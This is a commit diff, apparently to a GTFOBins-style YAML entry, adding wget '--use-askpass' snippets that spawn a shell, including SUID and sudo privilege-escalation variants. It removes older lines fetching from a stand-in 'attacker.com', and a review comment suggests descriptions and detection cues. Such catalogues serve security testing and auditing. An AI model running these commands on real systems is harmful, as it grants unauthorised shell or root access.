Add wget shell via --use-askpass

Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
Emanuel Duss 2022-12-16 16:33:15 +01:00 committed by GitHub
parent e637c45b84
commit 01042c2aa1
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23


@ -1,5 +1,11 @@
--- ---
functions: functions:
shell:
- code: |
TF=$(mktemp)
chmod +x $TF
echo -e '#!/bin/sh\n/bin/sh 1>&0' >$TF
wget --use-askpass=$TF 0
file-upload: file-upload:
- description: Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is, instruct the service to not URL-decode the body. Use `--post-data` to send hard-coded data. - description: Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is, instruct the service to not URL-decode the body. Use `--post-data` to send hard-coded data.
code: | code: |
@ -25,15 +31,15 @@ functions:
LFILE=file_to_save LFILE=file_to_save
wget $URL -O $LFILE wget $URL -O $LFILE
suid: suid:
- description: Fetch a remote file via HTTP GET request. - code: |
code: | TF=$(mktemp)
URL=http://attacker.com/file_to_get chmod +x $TF
LFILE=file_to_save echo -e '#!/bin/sh -p\n/bin/sh -p 1>&0' >$TF
./wget $URL -O $LFILE ./wget --use-askpass=$TF 0
sudo: sudo:
- description: Fetch a remote file via HTTP GET request. - code: |
code: | TF=$(mktemp)
URL=http://attacker.com/file_to_get chmod +x $TF
LFILE=file_to_save echo -e '#!/bin/sh\n/bin/sh 1>&0' >$TF
sudo wget $URL -O $LFILE sudo wget --use-askpass=$TF 0
--- ---
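Review bot: The three new `--use-askpass` entries (`shell`, `suid`, `sudo`) carry no `description`, unlike the `file-upload` entry above them, so a reader has to infer why the snippet yields a shell. I would add one such as `description: wget runs the program named by --use-askpass to obtain credentials, so a sudoers rule or SUID bit on wget amounts to arbitrary command execution with those privileges.` That wording also tells defenders what to audit: sudoers entries that permit wget, and process-creation logs where wget starts with `--use-askpass` pointing at a freshly created temporary file. The second hunk replaces the earlier `suid` and `sudo` file-fetch entries rather than adding alongside them, so the page no longer records that a privileged wget can also write files via `-O`; if that removal is intended, the commit message should say so.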